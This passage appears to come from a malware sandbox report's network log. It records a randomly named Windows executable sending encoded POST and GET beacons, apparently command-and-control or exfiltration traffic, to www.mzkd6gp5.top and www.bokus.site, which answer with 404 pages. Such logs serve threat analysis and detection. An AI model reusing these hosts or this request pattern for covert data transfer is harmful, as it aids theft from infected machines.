                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 59 2b 49 76 6a 57 45 41 63 36 54 75 4a 64 4d 34 50 46 54 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoY+IvjWEAc6TuJdM4PFTHw==
                                                                                    Jan 9, 2025 16:54:21.608357906 CET917INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NE7Oz%2BRLdH3W%2BbqQhjSXugvdGh%2FH38aCfWPFbFr0aCu5gajtSSSYCL1v%2F43SboHEgw2tsWzPFfIpOBpTGqlEtkFtDypRYCnVq8NrckcD4Ai8626gRqLRXzJUm%2BR5mhw%2Bc9H"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59af9e876e269-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=124098&min_rtt=124098&rtt_var=62049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:54:21.608403921 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.11.3049828104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:23.700556040 CET819OUTPOST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 2f 2f 42 54 78 4b 4f 37 43 76 49 33 6c 75 69 4f 64 30 6a 6f 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Q//BTxKO7CvI3luiOd0jo=
                                                                                    Jan 9, 2025 16:54:24.243889093 CET915INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:24 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKZcO2J89AEJJw0Ufm75pQOh%2BrjIY4c86hyZGAVXvORG0uVRyqqwLdHkh0G6M5%2FsvuABLqkTeUdcUt7JZmDbw3kV%2Fg0c9bOJX%2FzP5GsoSMhJTSpJcJ0slBMPw7Vv2Y8aSpOo"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59b0a8c0810ed-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118830&min_rtt=118830&rtt_var=59415&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:54:24.243936062 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.11.3049829104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:26.358896017 CET3936OUTPOST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2b 65 30 6b 38 33 36 31 47 6f 63 72 52 42 36 2f 36 32 78 6f 4c 31 56 48 4a 34 51 4d 6a 6e 41 2b 79 69 4b 4c 70 36 4f 37 33 68 69 33 52 4f 32 48 75 4c 51 4e 74 66 63 47 55 4b 6b 4d 2f 69 66 64 63 65 2f 53 68 6f 76 77 38 42 4c 58 32 6b 76 55 6c 56 33 72 55 53 34 31 53 6b 2b 39 72 50 63 71 62 43 37 62 6c 59 39 2f 32 56 32 6a 4b 71 43 64 2b 6e 71 69 61 69 79 78 58 69 36 35 71 72 38 4f 4a 71 45 4e 6d 55 35 53 63 45 51 69 75 4b 75 45 41 66 79 30 56 52 4c 4e 59 4e 49 4f 44 38 4f 63 6e 78 66 6d 7a 67 4c 65 6b 5a 2f 62 4e 61 33 57 33 68 6a 72 64 32 6a 76 49 38 32 4f 35 6c 77 2f 32 78 67 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R+e0k8361GocrRB6/62xoL1VHJ4QMjnA+yiKLp6O73hi3RO2HuLQNtfcGUKkM/ifdce/Shovw8BLX2kvUlV3rUS41Sk+9rPcqbC7blY9/2V2jKqCd+nqiaiyxXi65qr8OJqENmU5ScEQiuKuEAfy0VRLNYNIOD8OcnxfmzgLekZ/bNa3W3hjrd2jvI82O5lw/2xg3AihK+ACLA/mCdJjxtFSBkFmooipa002KHAx1R7WYE8UR7WhOZigYgq5OajRn7NdUGHmYC1NCStHf8x6sLLa0/i7PWvB0WeWx52tSAiBdhmvYJgBROa+BTkQ1BzYPQYPYxe3JDbnYPZAoChVGQjvOy/KcgaJPnU+/nUYJhkQmvDzsiy4fPFCH321gcvIasdu5eZYz8kVY2oA6F90fEJAlCSY3yS0UnoZvbUXmEHhQK4kH0Flzpr9OAQpefvCphmwUEO36bT+RBaLiLl3vGlLABU7gcP4y16lsgX9jGhCwqem3mM/oJ7OMwV3zyQaATjKmZ6TcG54pJQZGK5Zu1XRsH++9pnWQOGgZ7zbyCvSts9Nl1UCv2PKlD4RD+bHRKoFJydJ0Wwb1Wt05hP0v4Mc9y3jrjgHXCS3+6kGEmIjMaGpy6lTl8hd98byvOiynP85ke6zWthD+c869bmHCp/ScJ3oNuRt8mY9HGvfIlWxURU6LhKkY9QO3FPlUEBnsvEVihs4igtfasTmsHs1Y7/UPklpDCH3A3V3z1+GL20+i8QwMPXZPbj3TX3Xxo6reJ0VnPYOzln0j8kVDRtBXX+7w7IgjjlN+uzBTQViedTNM2axuj6y+vE+XJ3XTNgQsWgANYMaDgIqgabJ6zZkHHVd6bMI3hjAxgV3pz [TRUNCATED]
                                                                                    Jan 9, 2025 16:54:26.937643051 CET914INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:26 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZpPX3MVTEyrLZ1ZBb3%2Fite7QEnXTmOTiEgq842kYJGH%2BnHGJKJZzOoCQAj%2Ff9K2kZzKxBWDaVROEEKGf3d%2Fih4NQoy667gjFDKH9tB9lxWFLAbQrp9uFQNibggyg7cziV58D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59b1b2932233a-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119567&min_rtt=119567&rtt_var=59783&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:54:26.937685966 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.11.3049830104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:29.008332968 CET535OUTGET /3u0p/?6B-l7F=s2YzwEkhsdaL/kJXp3k+A3KGmeJ3qBEv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/7SrF93BKOupqiEzChM=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:54:29.548048019 CET924INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sd8Ww%2FW%2BucYITL%2FryslLANlYgQjyfyCJmgA3YPhjuABM2oocNs8qU8cAnL0556n1TqBMKg6YIr0qdyw2ssVD0IgEHRsPK3lw9baQB8C37FpoQFgrSLziU4UdxGhJdImkybSy"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59b2bbabe10ed-ORD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118732&min_rtt=118732&rtt_var=59366&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                    Jan 9, 2025 16:54:29.548089981 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.11.3049831199.192.21.169805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:34.927990913 CET793OUTPOST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 55 41 74 66 4d 6c 46 63 2b 69 2b 69 59 4c 76 64 49 63 42 76 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bUAtfMlFc+i+iYLvdIcBvA==
                                                                                    Jan 9, 2025 16:54:35.120670080 CET918INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:35 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.11.3049832199.192.21.169805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:37.648225069 CET813OUTPOST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 43 62 77 4d 2b 74 52 6e 6a 61 2b 4d 6d 2f 5a 35 7a 51 7a 49 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEECbwM+tRnja+Mm/Z5zQzI=
                                                                                    Jan 9, 2025 16:54:37.839062929 CET918INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:37 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.11.3049833199.192.21.169805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:40.359262943 CET2578OUTPOST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
